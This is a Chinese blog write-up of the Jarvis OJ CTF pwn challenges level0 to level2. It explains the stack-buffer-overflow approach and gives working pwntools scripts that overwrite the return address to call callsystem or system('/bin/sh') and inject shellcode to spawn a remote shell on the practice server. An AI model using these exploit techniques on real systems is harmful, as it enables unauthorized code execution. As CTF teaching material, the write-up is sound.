jarvis oj pwn

最新推荐文章于 2022-01-09 21:57:26 发布
最新推荐文章于 2022-01-09 21:57:26 发布
阅读量206 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44813849/article/details/97147689
版权

先附上一段大佬的总结,接着再说题。
栈溢出的基本套路:

  • 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接
  • 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh())
  • 构建payload,payload的基本构建:payload=shellcode+’a’*一个长度+p32(buf_addr),次序一定不能乱
  • 最后就可以发送payload,进行交互,得到shell的控制权,然后ls ,cat flag

level0

使用checksec命令查看出来是64位程序,所有保护全部关闭。
在这里插入图片描述然后使用ida打开
查看一下主函数部分,双击查看vulnerable_function()里的函数,
在这里插入图片描述在这里插入图片描述开辟的缓存区只有0x80个字节大小,但是read最多可以读取0x200个字节,这样就会造成缓存区溢出。

找到函数callsystem()
在这里插入图片描述只要控制程序返回到callsystem地址即可。找到callsystem地址。
在这里插入图片描述level0脚本

from pwn import *  #导入pwntools中pwn包的所有内容
s_addr=0x0000000000400596
p=remote("pwn2.jarvisoj.com",9881)# 链接服务器远程交互,等同于nc ip 端口 命令from pwn import *
p.recvline()#接收输出
p.sendline("A"*0x80+'A'*8+p64(s_addr))# 发送payload
p.interactive()# 反弹shell进行交互

这个题有一个函数callsystem,直接返回一个system(”/bin/sh”)也就是返回一个命令框,这就是我们想要的,所以不用构建shellcode和paload了。
最后在Ubuntu里运行一下。查看flag
在这里插入图片描述

level1

使用checksec命令查看出来是32位程序。
在这里插入图片描述
然后使用ida打开
查看一下主函数部分,双击查看vulnerable_function()里的函数。
在这里插入图片描述
在这里插入图片描述根据上一题可以看出这一题也有溢出。

附上脚本

from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')

shellcode = asm(shellcraft.sh())
io = remote('pwn2.jarvisoj.com', 9877)
text = io.recvline()[14: -2]

buf_addr = int(text, 16)

payload = shellcode + 'a' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
io.close()


context(arch = 'i386', os = 'linux')

是用来设置目标机的信息

  1. os设置系统为linux系统,在完成ctf题目的时候,大多数pwn题目的系统都是linux
  2. arch设置架构为amd64,可以简单的认为设置为64位的模式,对应的32位模式是’i386’
  3. log_level设置日志输出的等级为debug,这句话在调试的时候一般会设置,这样pwntools会将完整的io过程都打印下来,使得调试更加方便,可以避免在完成CTF题目时出现一些和IO相关的错误。
shellcode = asm(shellcraft.sh())

获取shellcode
1)获得执行system(“/bin/sh”)汇编代码所对应的机器码
asm(shellcraft.sh())
[14:-2]只是python里面的一个切片,代表”What’ sthis:0xffee6c50?”刚好取ffee6c50

这里的text为buf的地址,只不过是字符型的,需要int(text,16)用16进制的方法转化为int型

运行以后得到flag
在这里插入图片描述

level2

使用checksec命令查看出来是32位程序。
在这里插入图片描述然后使用ida打开
查看一下主函数部分,双击查看vulnerable_function()里的函数。
在这里插入图片描述

在这里插入图片描述按图片所示打开string窗口
在这里插入图片描述然后看到
看到/bin/sh
双击得到地址:
在这里插入图片描述在这里插入图片描述在system中看到
在这里插入图片描述在这里插入图片描述附上脚本

from pwn import * 
sh = remote('pwn2.jarvisoj.com', 9878)  
padd = 'a'*(0x88+4)
system_ad = p32(0x08048320)
bin_sh = p32(0x804a024)
payload = padd+system_ad+'a'*4+bin_sh
sh.sendline(payload)
sh.interactive()

在Ubuntu运行一下找出flag
在这里插入图片描述如果想要了解更多pwntools的使用可以参考一下这篇博客
https://blog.csdn.net/qq_29343201/article/details/51337025

Lstop.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
Jarvis OJ-PWN
weixin_45461609的博客
08-08 203
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 278
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
CTF-PWN笔记(一)-- 栈溢出 之 基础ROP
CK_0ff的博客
01-09 4094
文章目录栈linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单的栈溢出(ret2txt)ret2shellcode 栈 栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作栈顶,当然,它也有栈底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存
Jarvis OJ PWN题解 持续更新~
qq_41071646的博客
03-28 1078
最近沉(被)迷(迫)学pwn 看我们的志琦大佬 我就知道 pwn 玩玩就行 但是 不认真学 不行 然后向大佬打听了几个pwn的平台网站 打算 玩一下 这里找到了Jarvis OJ 然后我 是看那个 做出来的人多 我就做那个·~~~~~~~ 不定期的更新 Tell Me Something 然后这个这道题 其实很简单 栈溢出 没有任何防护 就防护了 ...
jarvisojpwn中level系列wp
Huiuyao的博客
12-09 2775
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
JarvisOJ.docx
03-10
JarvisOJ
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Jarvis声音.zip
09-28
钢铁侠贾维斯提示声QQ提示声钢铁侠贾维斯提示声QQ提示声电脑提示音钢铁侠贾维斯提示声QQ提示声钢铁侠贾维斯提示声QQ提示声电脑提示音
jarvis音频.zip
07-31
贾维斯各种音频,适用于Windows系统,苹果Siri等等,压缩包里放置的有更改window系统启动电脑声音的软件,献给所有喜欢钢铁侠的朋友。
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
Jarvis OJ pwn刷题
清霂的博客
03-26 240
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
jarvisoj pwn level1 ——记第一次shellcode的编写
Vccxx的博客
03-19 3579
jarvisoj(https://www.jarvisoj.com/challenges )pwn部分 level1 解题过程:在队友的指导下写了人生第一个shellcode感觉很刺激,过程中还是学到了很多东西,记录一下这个程序流程很简单,用ida分析就两个主要的函数:main:int __cdecl main(int argc, const char **argv, const char **en
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1059
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
Jarvis OJ-PWN-[XMAN]level1 wp
分不清东西南北的Laffey
09-26 1092
地址:nc pwn2.jarvisoj.com 9877 第一步:用checksec看开启了哪些保护 32位的 程序编译时关了栈不可执行保护 第二步:用IDA看伪代码 进去之后F5看到主函数 跟进vulnerable_function()函数 第三步:找到溢出点并加以分析 我们需要覆盖函数的返回地址 将其地址覆盖成shellcode的返回地址 这道题不像level0 里面有system函数...
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1196
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2371
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
JarvisOJ PWN level系列 wp
苗_的博客
02-09 403
菜菜的小白最近学习pwn,做了Jarvis上的一些题目进行练习,也从很多师傅的博客里学习到了很多新的知识,今天重新温习并且总结一下,以下的wp可能会比较详细,大佬可略: level0 这一题的难度还是蛮容易的,首先拖进ida里,发现有'/bin/sh/字符串和system函数,然后找溢出点,发现read函数这里发生溢出,只给了0x88的内存,但是却要读0x200个字节,必溢出: 然后构造...
jarvisoj pwn level系列
weixin_45551695的博客
05-26 183
某重新入坑的小白试图学会如何打pwn 从现在开始,个人计划也就开始了,希望能走下去吧, 先看看blibli这个基础的 CTF pwn 小白基础课 后面的UP主后面有,讲得浅显易懂 有基础有能力有时间的可以看看这个人 我不认识他但是货很干,很厉害,可以看看他的博客 然后 不多说,来搞事情 做题网站 level0 首先,下下来这个东东 拿到程序后先file可知为64位程序和动态链接 cheksec一下检查保护机制 我们能看到这个玩意,可以看到是一个只开启了NX的64位linux程序。 Stack:栈保护 R
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值